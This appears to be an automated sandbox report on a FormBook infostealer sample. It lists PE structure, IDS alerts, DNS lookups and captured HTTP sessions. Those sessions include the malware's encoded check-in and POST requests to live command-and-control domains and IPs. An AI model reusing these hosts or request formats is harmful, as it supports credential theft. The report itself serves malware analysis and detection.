                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc468a0x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x59c.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xc33ec0x70.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xc26e40xc280087586870fb5ee9ce7f353107f8bf8879False0.9318226321497429data7.815105086784425IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xc60000x59c0x600b24eefb6564db19594533a5b7600c3a7False0.41796875data4.059896828267816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xc80000xc0x2005ed466cf89e34bf6bd8157db8d13b283False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0xc60900x30cdata0.4371794871794872
                                                            RT_MANIFEST0xc63ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-28T18:29:39.701273+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549735161.97.142.14480TCP
                                                            2024-11-28T18:29:39.701273+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549735161.97.142.14480TCP
                                                            2024-11-28T18:29:57.349629+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549736107.155.56.3080TCP
                                                            2024-11-28T18:30:00.021193+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549737107.155.56.3080TCP
                                                            2024-11-28T18:30:02.697212+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549738107.155.56.3080TCP
                                                            2024-11-28T18:30:05.449809+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549739107.155.56.3080TCP
                                                            2024-11-28T18:30:05.449809+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549739107.155.56.3080TCP
                                                            2024-11-28T18:30:13.333737+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974018.139.62.22680TCP
                                                            2024-11-28T18:30:15.990010+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974118.139.62.22680TCP
                                                            2024-11-28T18:30:18.646422+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974218.139.62.22680TCP
                                                            2024-11-28T18:30:21.433517+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54974318.139.62.22680TCP
                                                            2024-11-28T18:30:21.433517+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54974318.139.62.22680TCP
                                                            2024-11-28T18:30:37.089228+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549744209.74.77.10780TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 28, 2024 18:29:38.277731895 CET4973580192.168.2.5161.97.142.144
                                                            Nov 28, 2024 18:29:38.404086113 CET8049735161.97.142.144192.168.2.5
                                                            Nov 28, 2024 18:29:38.404247046 CET4973580192.168.2.5161.97.142.144
                                                            Nov 28, 2024 18:29:38.413759947 CET4973580192.168.2.5161.97.142.144
                                                            Nov 28, 2024 18:29:38.540617943 CET8049735161.97.142.144192.168.2.5
                                                            Nov 28, 2024 18:29:39.701018095 CET8049735161.97.142.144192.168.2.5
                                                            Nov 28, 2024 18:29:39.701050997 CET8049735161.97.142.144192.168.2.5
                                                            Nov 28, 2024 18:29:39.701066971 CET8049735161.97.142.144192.168.2.5
                                                            Nov 28, 2024 18:29:39.701081991 CET8049735161.97.142.144192.168.2.5
                                                            Nov 28, 2024 18:29:39.701272964 CET4973580192.168.2.5161.97.142.144
                                                            Nov 28, 2024 18:29:39.701350927 CET4973580192.168.2.5161.97.142.144
                                                            Nov 28, 2024 18:29:39.706933022 CET4973580192.168.2.5161.97.142.144
                                                            Nov 28, 2024 18:29:39.828720093 CET8049735161.97.142.144192.168.2.5
                                                            Nov 28, 2024 18:29:55.671720982 CET4973680192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:29:55.827507973 CET8049736107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:29:55.827666044 CET4973680192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:29:55.840604067 CET4973680192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:29:55.967154026 CET8049736107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:29:57.349628925 CET4973680192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:29:57.458861113 CET8049736107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:29:57.458914995 CET8049736107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:29:57.458977938 CET4973680192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:29:57.459017038 CET4973680192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:29:57.472609997 CET8049736107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:29:57.472697973 CET4973680192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:29:58.368007898 CET4973780192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:29:58.492079020 CET8049737107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:29:58.492218971 CET4973780192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:29:58.506473064 CET4973780192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:29:58.630249023 CET8049737107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:00.021193027 CET4973780192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:00.100807905 CET8049737107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:00.100832939 CET8049737107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:00.100913048 CET4973780192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:00.100951910 CET4973780192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:00.148152113 CET8049737107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:00.148226023 CET4973780192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:01.039685011 CET4973880192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:01.163891077 CET8049738107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:01.164040089 CET4973880192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:01.178642035 CET4973880192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:01.298799992 CET8049738107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:01.298852921 CET8049738107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:02.697211981 CET4973880192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:02.771729946 CET8049738107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:02.771806955 CET8049738107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:02.771842003 CET4973880192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:02.771914005 CET4973880192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:02.817621946 CET8049738107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:02.817857981 CET4973880192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:03.711899042 CET4973980192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:03.834223986 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:03.834314108 CET4973980192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:03.843334913 CET4973980192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:03.963784933 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.449661016 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.449680090 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.449693918 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.449748039 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.449759960 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.449773073 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.449784040 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.449809074 CET4973980192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:05.449853897 CET4973980192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:05.449987888 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.450000048 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.450023890 CET4973980192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:05.450035095 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:05.450072050 CET4973980192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:05.473499060 CET4973980192.168.2.5107.155.56.30
                                                            Nov 28, 2024 18:30:05.594368935 CET8049739107.155.56.30192.168.2.5
                                                            Nov 28, 2024 18:30:11.683485985 CET4974080192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:11.803688049 CET804974018.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:11.803786039 CET4974080192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:11.819669008 CET4974080192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:11.939846992 CET804974018.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:13.333736897 CET4974080192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:13.426341057 CET804974018.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:13.426383972 CET804974018.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:13.426428080 CET4974080192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:13.426536083 CET4974080192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:13.454468012 CET804974018.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:13.454675913 CET4974080192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:14.352382898 CET4974180192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:14.474153996 CET804974118.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:14.474370003 CET4974180192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:14.488987923 CET4974180192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:14.609414101 CET804974118.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:15.990010023 CET4974180192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:16.070369959 CET804974118.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:16.070461035 CET804974118.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:16.070519924 CET4974180192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:16.070573092 CET4974180192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:16.110522985 CET804974118.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:16.110657930 CET4974180192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:17.008981943 CET4974280192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:17.129132986 CET804974218.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:17.129295111 CET4974280192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:17.143877029 CET4974280192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:17.268465996 CET804974218.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:17.268522024 CET804974218.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:18.646421909 CET4974280192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:18.727408886 CET804974218.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:18.727494955 CET4974280192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:18.766980886 CET804974218.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:18.767043114 CET4974280192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:19.665090084 CET4974380192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:19.785206079 CET804974318.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:19.785470009 CET4974380192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:19.794307947 CET4974380192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:19.914560080 CET804974318.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:21.433264971 CET804974318.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:21.433461905 CET804974318.139.62.226192.168.2.5
                                                            Nov 28, 2024 18:30:21.433516979 CET4974380192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:21.436032057 CET4974380192.168.2.518.139.62.226
                                                            Nov 28, 2024 18:30:21.556243896 CET804974318.139.62.226192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 28, 2024 18:29:37.657362938 CET6139353192.168.2.51.1.1.1
                                                            Nov 28, 2024 18:29:38.271363974 CET53613931.1.1.1192.168.2.5
                                                            Nov 28, 2024 18:29:54.743236065 CET5571153192.168.2.51.1.1.1
                                                            Nov 28, 2024 18:29:55.669398069 CET53557111.1.1.1192.168.2.5
                                                            Nov 28, 2024 18:30:10.479465008 CET5108353192.168.2.51.1.1.1
                                                            Nov 28, 2024 18:30:11.474409103 CET5108353192.168.2.51.1.1.1
                                                            Nov 28, 2024 18:30:11.680951118 CET53510831.1.1.1192.168.2.5
                                                            Nov 28, 2024 18:30:11.681051016 CET53510831.1.1.1192.168.2.5
                                                            Nov 28, 2024 18:30:26.446403980 CET5032553192.168.2.51.1.1.1
                                                            Nov 28, 2024 18:30:26.676800966 CET53503251.1.1.1192.168.2.5
                                                            Nov 28, 2024 18:30:35.133902073 CET6001953192.168.2.51.1.1.1
                                                            Nov 28, 2024 18:30:35.633138895 CET53600191.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 28, 2024 18:29:37.657362938 CET192.168.2.51.1.1.10x7200Standard query (0)www.070001325.xyzA (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:29:54.743236065 CET192.168.2.51.1.1.10x101cStandard query (0)www.expancz.topA (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:10.479465008 CET192.168.2.51.1.1.10xa39cStandard query (0)www.taxiquynhonnew.clickA (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:11.474409103 CET192.168.2.51.1.1.10xa39cStandard query (0)www.taxiquynhonnew.clickA (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:26.446403980 CET192.168.2.51.1.1.10x2b54Standard query (0)www.epitomize.shopA (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:35.133902073 CET192.168.2.51.1.1.10x2429Standard query (0)www.learnwithus.siteA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 28, 2024 18:29:38.271363974 CET1.1.1.1192.168.2.50x7200No error (0)www.070001325.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:29:55.669398069 CET1.1.1.1192.168.2.50x101cNo error (0)www.expancz.top107.155.56.30A (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:11.680951118 CET1.1.1.1192.168.2.50xa39cNo error (0)www.taxiquynhonnew.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                            Nov 28, 2024 18:30:11.680951118 CET1.1.1.1192.168.2.50xa39cNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:11.680951118 CET1.1.1.1192.168.2.50xa39cNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:11.680951118 CET1.1.1.1192.168.2.50xa39cNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:11.681051016 CET1.1.1.1192.168.2.50xa39cNo error (0)www.taxiquynhonnew.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                            Nov 28, 2024 18:30:11.681051016 CET1.1.1.1192.168.2.50xa39cNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:11.681051016 CET1.1.1.1192.168.2.50xa39cNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:11.681051016 CET1.1.1.1192.168.2.50xa39cNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:26.676800966 CET1.1.1.1192.168.2.50x2b54Name error (3)www.epitomize.shopnonenoneA (IP address)IN (0x0001)false
                                                            Nov 28, 2024 18:30:35.633138895 CET1.1.1.1192.168.2.50x2429No error (0)www.learnwithus.site209.74.77.107A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.070001325.xyz
                                                            • www.expancz.top
                                                            • www.taxiquynhonnew.click

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549735161.97.142.144801268C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 28, 2024 18:29:38.413759947 CET551OUTGET /gebt/?rvEtL=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edh05neJJauEoNaZQG1y+cvjoSHU7S86EKf7lUg55fOkggqQ==&mFTD=mPHXHp HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.070001325.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Nov 28, 2024 18:29:39.701018095 CET1236INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Thu, 28 Nov 2024 17:29:39 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 2966
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "66cce1df-b96"
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                            Nov 28, 2024 18:29:39.701050997 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                            Nov 28, 2024 18:29:39.701066971 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                            Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549736107.155.56.30801268C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 28, 2024 18:29:55.840604067 CET808OUTPOST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 206
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 72 76 45 74 4c 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 53 7a 31 7a 64 77 2f 54 2f 36 64 59 2b 35 35 56 6e 37 54 6f 67 44 72 65 33 4f 51 5a 5a 69 31 74 67 76 55 6f 44 54 30 3d
                                                            Data Ascii: rvEtL=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLSz1zdw/T/6dY+55Vn7TogDre3OQZZi1tgvUoDT0=
                                                            Nov 28, 2024 18:29:57.458861113 CET697INHTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Thu, 28 Nov 2024 17:29:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
